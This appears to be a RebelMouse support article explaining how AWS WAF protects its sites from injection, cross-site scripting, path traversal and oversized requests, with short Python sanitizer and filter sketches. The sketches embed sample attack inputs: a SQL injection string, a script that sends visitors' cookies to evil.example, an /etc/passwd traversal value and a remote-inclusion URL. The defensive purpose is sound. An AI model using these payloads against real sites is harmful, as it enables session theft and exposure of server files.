Understanding AWS’s Web Application Firewall for Server Protection

Amazon Web Services' (AWS) Web Application Firewall (WAF) helps protect your web applications (or APIs) against common web exploits that may affect availability, compromise security, or consume excessive resources. AWS WAF gives RebelMouse developers control over how traffic reaches our applications by enabling us to create security rules that block common attack patterns, such as SQL injection or cross-site scripting (XSS), as well as rules that filter out specific traffic patterns we have defined. These rules are also updated regularly as new threats emerge.


With AWS WAF, we're making sure that all of our sites are covered against some of the most common attacks, as defined by the Open Web Application Security Project (OWASP). OWASP is an online community that produces freely available articles, methodologies, documentation, tools, and technologies in the field of web application security.

Possible Common Attacks

Injections: Injection flaws allow attackers to relay malicious code through an application to another system. These attacks include calls to the operating system via system calls, the use of external programs via shell commands, as well as calls to back-end databases via SQL (e.g., SQL injection). Whole scripts written in Perl, Python, and other languages can be injected into poorly designed applications and executed. Any time an application uses an interpreter of any type, there is a danger of introducing an injection vulnerability.
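The classic case is SQL injection. The sketch below, using an in-memory SQLite database with a hypothetical `users` table, shows how string concatenation lets attacker-controlled input break out of a query, and how a parameterized query avoids it. This is illustrative of the vulnerability class, not of how AWS WAF itself works (WAF blocks such requests at the edge before they reach the application):

```python
import sqlite3

# Hypothetical table for illustration only.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, is_admin INTEGER)")
conn.execute("INSERT INTO users VALUES ('alice', 0)")

user_input = "alice' OR '1'='1"  # attacker-controlled value

# Vulnerable: concatenation lets the quote break out of the string
# literal, so the injected OR clause matches every row.
vulnerable = conn.execute(
    "SELECT name FROM users WHERE name = '" + user_input + "'"
).fetchall()

# Safe: a parameterized query treats the whole value as data, not SQL.
safe = conn.execute(
    "SELECT name FROM users WHERE name = ?", (user_input,)
).fetchall()

print(vulnerable)  # injected OR clause returns all rows
print(safe)        # no user is literally named "alice' OR '1'='1"
```

Parameterization in the application and request filtering at the firewall are complementary: the former removes the vulnerability, the latter blocks known attack patterns before they arrive.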

For example, if somebody tries to inject JavaScript into your site, AWS WAF can block the request automatically so the payload never reaches the application.

Protection for Cross-Site Scripting: Cross-site scripting flaws occur when web applications include user-provided data in webpages that are sent to the browser without proper sanitization. If the data isn't properly validated or escaped, an attacker can use these vectors to embed scripts, inline frames (iframes), or other objects into the rendered page. These, in turn, can be used for a variety of malicious purposes, such as stealing user credentials with keyloggers or installing malware on the user's system. The impact of the attack is magnified if that user data persists server side in a data store and is then delivered to a large set of other users.

Consider the example of a popular blog that accepts user comments. If user comments aren't correctly sanitized, a malicious user can embed a malicious script in the comments, for example a script tag that exfiltrates visitors' cookies.

The injected code then executes any time a legitimate user loads that blog article.
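The application-side fix is to escape user content on output so the browser renders it as text rather than executing it. A minimal sketch using Python's standard-library `html.escape` (the function name `sanitize_comment` and the example payload are illustrative, not part of any RebelMouse API):

```python
import html

def sanitize_comment(comment: str) -> str:
    """Escape HTML special characters so user comments render as
    inert text instead of executable markup."""
    return html.escape(comment)

# Hypothetical malicious comment: a script that ships the visitor's
# cookies to an attacker-controlled host.
malicious = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
print(sanitize_comment(malicious))
```

Escaping on output and WAF filtering at the edge work together: even if one layer misses a payload, the other can still neutralize it.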

Broken Access Control: This category of application flaw covers the lack of, or improper enforcement of, restrictions on what authenticated users are allowed to do. AWS WAF can filter dangerous HTTP request patterns that may indicate path traversal attempts, or remote and local file inclusion (RFI/LFI). AWS WAF checks whether HTTP request components contain ../ or ://.

This helps us prevent attackers from exploiting vulnerabilities that would let a user access resources, or perform actions, that they are not authorized for.
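The substring check described above can be sketched as follows. This is a simplified illustration of the matching logic, not the actual AWS WAF implementation or API; the function name and request shape are assumptions:

```python
# Patterns AWS WAF looks for in request components, per the text above:
# "../" hints at path traversal, "://" at remote file inclusion.
SUSPICIOUS_PATTERNS = ("../", "://")

def is_suspicious(uri: str, query_string: str = "") -> bool:
    """Flag a request when its URI or query string contains a
    traversal or file-inclusion pattern."""
    for component in (uri, query_string):
        if any(pattern in component for pattern in SUSPICIOUS_PATTERNS):
            return True
    return False

print(is_suspicious("/articles/view"))                       # clean request
print(is_suspicious("/files", "path=../../etc/passwd"))      # traversal
print(is_suspicious("/page", "include=http://evil.example"))  # RFI
```

A real WAF rule normalizes encodings first (e.g. URL-decoding `%2e%2e%2f` into `../`) before matching, which is why this kind of filtering belongs at the firewall rather than in ad hoc application code.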

How AWS WAF Protects Our Servers From Attacks

Insufficient Attack Protection: AWS WAF enforces a level of hygiene for inbound HTTP requests. Size constraint conditions help to build rules that ensure that components of HTTP requests fall within specifically defined ranges. We can use these rules to avoid processing abnormal requests. An example is to limit the size of URIs or query strings to values that make sense to our application.

In our case, we're limiting the URI and QUERY_STRING bytes.
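A size-constraint condition of this kind can be sketched as a simple byte-length check. The thresholds below are illustrative assumptions — the actual limits we enforce are not published here:

```python
# Hypothetical limits for the sketch; real values depend on what
# makes sense for the application.
MAX_URI_BYTES = 512
MAX_QUERY_STRING_BYTES = 1024

def within_size_limits(uri: str, query_string: str) -> bool:
    """Mimic a WAF size-constraint condition: measure each request
    component in bytes and reject abnormally large requests."""
    return (len(uri.encode("utf-8")) <= MAX_URI_BYTES
            and len(query_string.encode("utf-8")) <= MAX_QUERY_STRING_BYTES)

print(within_size_limits("/articles/view", "id=42"))  # normal request
print(within_size_limits("/a" * 1000, ""))            # oversized URI
```

Measuring in bytes rather than characters matters because multi-byte UTF-8 input would otherwise slip past a character-count limit.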

Using Components With Known Vulnerabilities: AWS WAF filters and blocks HTTP requests aimed at component functionality that our applications don't use. This reduces the attack surface of those components if vulnerabilities are later discovered in functionality we're not using.

AWS WAF matches URIs to filenames that end with:

  • .cfg
  • .conf
  • .config
  • .ini
  • .log
  • .bak
  • .backup

The HTTP request component inspected:

  • URI
We also maintain a process for mitigating known vulnerabilities across the lifecycle of these components: we identify and track the dependencies of our application, as well as the dependencies of the underlying components, so that we can monitor their security over time.

Robots.txt Crawl-Delay Directive: Aside from the AWS WAF protection mechanisms, we have also added a directive called crawl-delay to our default robots.txt files.

The crawl-delay directive tells crawlers to slow down so they don't overload the web server. On our pages, we have it set to 0.1 seconds, which is the default setting for our robots.txt file. Clients can override the crawl-delay directive in our Layout & Design Tool; if you have already made manual changes to your robots.txt file, we recommend that you check it and add the directive manually. You can also adjust the crawl-delay value to suit your needs.
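With the default value described above, the relevant lines of the robots.txt file look like this (the wildcard user-agent line is the usual convention; your file may scope the directive to specific crawlers instead):

```
User-agent: *
Crawl-delay: 0.1
```

Note that support for crawl-delay varies by crawler — some honor it, while others (such as Googlebot) ignore it — which is why it complements, rather than replaces, the WAF rate-limiting described below.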

Overall, this server protection allows us to automatically block repeated requests to our sites so that we can identify malicious attacks and stop them right away. Based on the status code returned, you can tell why a request was blocked:

  • 429: Too many requests have been made.
  • 406: The status code for OWASP risks.
    • The response message will contain a code that matches a specific type of vulnerability. We use an internal set of codes to hide our protection logic from public users, but we can share what each one means with you as needed.

If you have any questions, please reach out to your account manager or email us at support@rebelmouse.com, and we'll help you solve your particular use case.
